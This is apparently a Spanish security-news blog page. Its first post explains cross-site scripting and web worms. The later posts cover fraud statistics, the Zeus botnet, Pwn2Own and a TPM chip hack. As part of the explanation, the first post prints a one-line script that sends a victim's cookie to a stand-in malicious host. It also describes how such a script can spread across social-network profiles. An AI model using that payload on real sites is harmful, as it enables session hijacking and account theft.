Que es un gusano web y cómo funciona

Antiguamente, los gusanos eran códigos maliciosos, preparados para extenderse rápidamente de sistema en sistema, mediante las redes p2p, el envío automatizado por correo, etc. Los gusanos eran programas informáticos, que al ejecutarlos, utilizaban tu ordenador para extenderse a muchos mas sistemas, sin que tu vieses absolutamente nada.

En la actualidad, con la extrema popularidad e importancia que tiene el mundo web, los gusanos han ido evolucionando, de forma que ha nacido un nuevo tipo de gusano, que no infecta tu ordenador, ni es un programa compilado que debes descargar, sino que es un pequeño fragmento de código javascript, que infecta tu perfil en alguna web.

Todo empezó con los agujeros de seguridad de tipo Cross Site Scripting (XSS), un tipo de agujero de seguridad, al que no se le presta tanta atención como a otros que a priori parecen mas peligrosos, como los Sql Injection, o similares, pero que es tanto o mas peligroso.

Pero para entender los web worms, debemos empezar desde muy al principio, desde las bases de los ataques tipo XSS. Un ataque XSS persigue, normalmente, robar la cookie del visitante. La cookie es una pequeña porción de información, que sirve para que la página web, recuerde que te has autenticado correctamente, y no te pida la contraseña cada vez que quieres hacer una acción.

Para robar la cookie, los ataques XSS se sirven de código javascript, ya que el código javascript se ejecuta en el navegador, tiene acceso a las cookies del mismo, sin embargo, por seguridad, un código javascript solo puede ver las cookies del sitio web que hospeda ese código javascript.

Es decir, si yo visito www.ejemplo.com, y esta web me envía un javascript que accede a las cookies, este javascript no podrá ver mis cookies de otras páginas web.

Y es en esa protección, en la que reside el peligro del Cross Site Scripting; imaginemos una página web que te pregunta tu nombre al entrar, tu lo introduces, y te muestra por pantalla: Hola! <nombreintroducido>. Si yo, en el nombre, introduzco:

<script>alert(document.cookie)</script>

Mi código javascript, podrá acceder a las cookies de esa página web, ya que el código javascript, el navegador, lo recibe a través de la web que me ha preguntado mi nombre.

¿Cual es el peligro real de todo esto?

Veamos un ejemplo ficticio, pero posible…Imaginemos que gmail tiene un error de seguridad, y permite introducir código javascript en el cuerpo de un mail, yo podría escribirte un mail que contubiese el siguiente código:

<script>document.location.href = ‘www.paginamaligna.com/recogercookie.php?cookie=’+document.cookie; </script>

Cuando tu abrieses el correo, el navegador te redirigiría hacía paginamaligna.com, pasándole por GET, tu cookie, a la cual hemos tenido acceso, ya que el javascript, para el navegador, procedía de gmail.

Una vez con tu cookie, borro mi cookie de gmail, y me pongo la tuya, ahora ya estoy autentificado en gmail, con tu nombre de usuario, y puedo leer tu correo.

Una vez entendido esto, entender los gusanos web (web worms) son fáciles de entender, imagina que yo estoy en una red social, y tengo un perfil público, en el cual hay un campo ‘intereses’, donde la gente pone lo que le gusta hacer. Si ese campo, permite introducir código HTML, sin filtrarlo, yo podría introducir:

<script>alert(document.cookie);</script>

Y cuando alguien visitase mi perfil, se mostrase su cookie. Si ahora en lugar de un alert, introduzco un código, que hace un petición POST a la red social, y modifica el perfil de la victima, introduciendo en el campo intereses, el mismo código malicioso que yo tengo, cada persona que entre, se le modificará automáticamente su perfil, y cada persona que vea ese perfil modificado, modificará automaticamente el suyo, y así sucesivamente.

En unas horas, todos los perfiles de una red social pueden estar modificados, es decir, infectados con el código.

Además, este código podría enviarle las cookies al autor original del código, mediante una petición invisible a alguna web (usando un iframe invisible, por ejemplo), de forma que no solo ha infectado todos los perfiles, sino que tiene todas las cookies, de todo el mundo, en la web.

Aunque todo esto suene rocambolesco, es una realidad, y ha sucedido ya en muchas ocasiones, siendo quizás la mas famosa, la de samy, un código javascript que infecto millones de perfiles en myspace, mediante un agujero de tipo XSS.

Como siempre, para protegerse de estos ataques, lo mejor es utilizar noscript, para firefox.

Via  rooibo.com

La e-confianza de los consumidores españoles

Según el Observatorio de la Seguridad de la Información de INTECO, como expresa en su estudio sobre el fraude a través de Internet entre 2007 y 2009, ha aumentado el nivel de confianza en Internet por parte de los usuarios españoles para realizar operaciones económicas.

Se trata de un grado de confianza alto con respecto a periodos anteriores. Por ejemplo, aproximadamente 6 de cada 10 usuarios muestran mucha o bastante confianza en la utilización de banca electrónica.

A pesar de este considerable nivel de confianza en Internet como canal de realización de transacciones económicas, los ciudadanos siguen mostrando más confianza en la utilización del servicio en persona.

En cualquier caso, la tendencia es positiva: el porcentaje de ciudadanos que afirma confiar mucho y bastante en las operaciones que implican pagos y transacciones económicas a través de Internet se incrementa trimestre tras trimestre. Cada día disminuyen un poco más para los usuarios las diferencias entre la banca y comercio electrónicos y los mismos sectores tradicionales, y es posible prever una identificación a largo plazo en el mismo servicio, sea cual sea el medio de interacción de los agentes.

El haber sufrido un intento no consumado de fraude no influye significativamente en los hábitos de uso de compra y banca electrónica: tras haber sufrido un intento de fraude, un 83,3% de los usuarios mantiene invariables sus hábitos de compra en Internet y un 90,3%, sus hábitos de banca electrónica.

Igualmente, las tasas de abandono son minoritarias (en torno al 4%), incluso entre los ciudadanos que han experimentado una pérdida económica. Se trata de un paso más en el camino de la adaptación de la sociedad a las nuevas tecnologías, concebidas cada vez por más usuarios como herramientas para alcanzar eficacia y eficiencia, y no como una fuente de peligros o fraudes.

Fuente: www.inteco.es

Via seguridadinformatica.es

Reporte de crimenes en Internet

El Internet Crime Complaint Center (IC3) comenzó a funcionar el 8 de mayo de 2000, como el Internet Fraud Complaint Center. Establecida como una asociación entre la National White Collar Crime Center (NW3C) y la Oficina Federal de Investigaciones (FBI), IC3 sirve como un vehículo para recibir, elaborar y remitir denuncias penales sobre un campo en rápida expansión como los es delincuencia cibernética.

Desde su creación, IC3 ha recibido quejas en un amplio espectro de asuntos de delitos informáticos, incluidos el fraude en línea (en sus múltiples formas), derechos de propiedad intelectual (DPI), intrusión informática (hacking), espionaje económico (robo de secretos comerciales), la pornografía infantil, blanqueo internacional de dinero, robo de identidad y una creciente lista de otros asuntos penales y civiles.

Durante 2009, IC3 recibió 336.655 peticiones y denuncias. Esto fue un aumento del 22,3% en comparación con 2008, cuando se recibieron 275.284 denuncias.

De los 336.655 reclamos presentadas al IC3, 146.663 se refieren a violaciones de la la ley como fraude y pérdidas financiera por parte del denunciante. La pérdida total en dólares de todos los casos mencionados fue 559,7 millones dólares con una pérdida promedio de U$S 575 por denunciante. Esto es 264,6 millones dólares por encima de las pérdidas registradas en 2008.

SEGURINFO 2010 – VII Congreso Internacional de Seguridad de la Información

El crecimiento de información en las empresas y la variedad de formas en que es posible compartir información, genera constantemente nuevos desafíos en los especialistas, quienes necesitan definir buenas prácticas para colaborar con el usuario en la gestión de la información.

Con esta séptima edición de SEGURINFO, que se realizará los días 10 y 11 de marzo del 2010, en el Hotel Sheraton Buenos Aires,  USUARIA continúa con sus aportes a la comunidad, generando el ámbito para compartir experiencias y evaluar soluciones a los desafíos que genera el crecimiento del uso de la Tecnología de la Información y las Comunicaciones.

Para esta actividad, se convoca a todos los especialistas que participan en la responsabilidad de la gestión de diseñar y administrar la Seguridad de la Información.

Entre las áreas temáticas incluidas en el Programa del Congreso se desatacan:

  • Sistema de Gestión de Seguridad de la Información.
  • Política de Seguridad.
  • Organización de la Seguridad de la Información.
  • Gestión de Activos.
  • Seguridad ligada a Recursos Humanos.
  • Seguridad Física y del Entorno.
  • Gestión de las Comunicaciones y Operaciones.
  • Control de Acceso.
  • Adquisición, Desarrollo y Mantenimiento de los Sistemas de la Información.
  • Gestión de un incidente en la Seguridad de la Información.
  • Continuidad del Negocio.
  • Cumplimiento.
  • Gestión de Riesgos.

Más Información en: http://www.usuaria.org.ar/ http://www.segurinfo.org

Websense Security Labs reporta ataques dirigidos a la ‘confianza de los usuarios’

Uno de cada diez resultados de “búsqueda top” son considerados código malicioso.

Websense dio a conocer los resultados de su reporte de investigación bianual Websense Security Labs, El estado de la seguridad de Internet, Q3-Q4 2009. La compañía identificó que 13,7% de las búsquedas de noticias/palabras populares (definidas por Yahoo! Buzz & Google Trends) llevan a malware. Los ataques de envenenamiento de la optimización de los motores de búsqueda dirigidos a las principales búsquedas le permiten a los hackers llevar tráfico a sus sitios.

En contraste con la primera mitad del año cuando los ataques de inyección masiva como Gumblar, Beladen y Nine Ball promovieron un fuerte crecimiento en el número de sitios Web malicioso, Websense Security Labs vio una reducción de 3,3% en el crecimiento del número de sitios Web comprometidos.

Los autores de código malicioso reemplazaron sus métodos de ataques sin dirección específica con esfuerzos enfocados en las propiedades de la Web 2.0 con más tráfico y múltiples páginas. En general, comparando la segunda mitad de 2009 con el mismo período de 2008, hubo un crecimiento promedio de 225% en sitios Web maliciosos.

Los autores de código malicioso siguen aprovechando la reputación de los sitios Web y explotando la confianza del usuario pues la segunda mitad de 2009 revela que 71% de los sitios Web con código malicioso son sitios legítimos que han sido comprometidos. Los sitios Web 2.0 que permiten el contenido generado por los usuarios son el principal blanco de los cibercriminales y creadores de spam. La tecnología Websense Defensio habilitada por Websense Security Labs identifica que 95% de los comentarios generados por los usuarios en blogs, salas de chat y centros de mensajes son spam o maliciosos.

Websense Security Labs descubrió que 35% de los ataques Web maliciosos incluyeron código que robaba datos, lo que demuestra que los atacantes van tras información y datos esenciales.

La Web sigue siendo el vector para los ataques de robo de datos más populares. En la segunda mitad de 2009, Websense Security Labs descubrió que 58% de los ataques para robar información se realizaron a través de la Web. Decenas de miles de cuentas de correo electrónico de Hotmail, Gmail y Yahoo! fueron hackeadas, y se robaron y publicaron contraseñas en línea lo que se derivó en un marcado aumento del número de correos electrónicos no deseados.

Websense Security Labs identificó que 85,8% de todos los correos electrónicos era spam, y durante la segunda mitad del año, 81% de los correos electrónicos contenían un enlace malicioso.

Los hackers maliciosos ya están enfocando sus esfuerzos en asegurar que estén dirigiendo sus víctimas directamente a ellos. Al envenenar los resultados de búsqueda y enfocarse en los sitios Web 2.0, sus esfuerzos a menudo son más eficientes y efectivos. La naturaleza combinada de las amenazas de hoy, junto con sitios legítimos comprometidos, toma total ventaja de la creciente percepción de confianza cuando se utilizan motores de búsqueda y se interactúa con amigos o conocidos en línea”, declaró Dan Hubbard, director de tecnología de Websense.

Video presentando los principales datos del informe (en ingles).

Fuente: ebizLatam.com

Visto en SeguInfo

Detectado un ciberataque que tendría alcance mundial

Un ataque informático a gran escala habría permitido a sus autores tomar el control de 74 mil computadoras en 196 países, según la empresa de seguridad NetWitness. Los países más afectados son Estados Unidos, Egipto, Arabia Saudita, Turquía y México.

A lo largo de un año, más de 2 mil organizaciones han sido infectadas. Entre ellas figuran administraciones públicas, grandes empresas, bancos y centros educativos.

Según la compañía, el Zeus captura contraseñas en línea, cuentas de correo y redes sociales y suministra a sus autores el control remoto de las máquinas por lo que pueden manejar cuentas, información financiera y datos privados.
La compañía informa que detectó su existencia en enero en una revisión rutinaria de sistemas. Una investigación más profunda detectó que estaban comprometidos unas 68 mil credenciales corporativas por lo que la firma califica la expansión de este virus de “epidemia”.

Los primeros datos del ataque se remontan a mediados del año pasado aunque algunas informaciones sitúan su inicio en 2008. No está clara la autoría del mismo, aunque podría tratarse de un grupo del Este europeo que empleara computadoras comprometidas en China.

El programa espía Zeus ya es conocido por los expertos en seguridad. Trabaja sobre el navegador Firefox y aprovecha vulnerabilidades del sistema operativo Windows Vista y XP.
Diez agencias del Gobierno norteamericano habrían sido víctimas del mismo, según The Wall Street Journal. NetWitness está dirigida por un antiguo miembro de las fuerzas armadas estadounidenses.

Este ataque tiene unas dimensiones mucho mayores que el denunciado por Google a principios de este año.

Via vanguardia.com.mx

Concurso para hackers

Un concurso de hacking que tendrá lugar el próximo mes ofrecerá premios de 15,000 dólares a cualquiera que pueda superar la seguridad impuesta en los iPhone, BlackBerry Bold, Droid y Nokia, los teléfonos que teóricamente son realmente eficientes en este apartado.

Los premios son un 50% más cuantiosos que los que se ofrecieron hace un año en el evento Pwn2Own, un concurso que tendrá lugar como parte de las conferencias de seguridad CanSecWest que se celebran en Vancouver a partir del próximo 24 de marzo.

En Pwn2Own se ofrecerá de nuevo un reto doble, que tratará de ser superado por los hackers, que deberán acceder tanto al navegador como al sistema operativo móvil superando las técnicas de seguridad que se manejan en dichos dispositivos. ¿Quién logrará resistir los ataques de los expertos hackers?

Fuente: theinquirer

Hackean el chip más seguro de la industria informática

Chris Tarnovsky 300x167 Hackean el chip más seguro de la industria informática

Chris Tarnovsky encontró una manera de vulnerar los chips designados como TPM, sigla en inglés de Módulo de Plataforma Confiable, considerados los más seguros de la industria informática. El ataque permitiría el volcado de documentos que se suponían seguros de ordenadores fuertemente protegidos. Este descubrimiento muestra una de las maneras con la que los espías y otros atacantes bien financiados pueden adquirir secretos militares y comerciales, y se convierte en una preocupación tras el incremento del espionaje bajo el amparo de los estados, destacando los recientes ataques a Google.

Vargas llama a niños, niñas y jóvenes dominicanos a pensar antes de publicar información en Internet

Dia de Iroternet Seguro 9 de febreo

Advierte informaciones pueden usarse incluso para acoso sexual infantil

RD registra casi 430 mil cuentas de Internet

SANTO DOMINGO.-El presidente del Instituto Dominicano de las Telecomunicaciones (Indotel), hizo un llamado a los niños, niñas y jóvenes dominicanos a que piensen  antes publicar cualquier información, fotos o videos en Internet, tras advertir que estas informaciones pueden ser utilizadas por personas inescrupulosas para hacer daños incluyendo el acoso sexual infantil.

Continuar leyendo “Vargas llama a niños, niñas y jóvenes dominicanos a pensar antes de publicar información en Internet”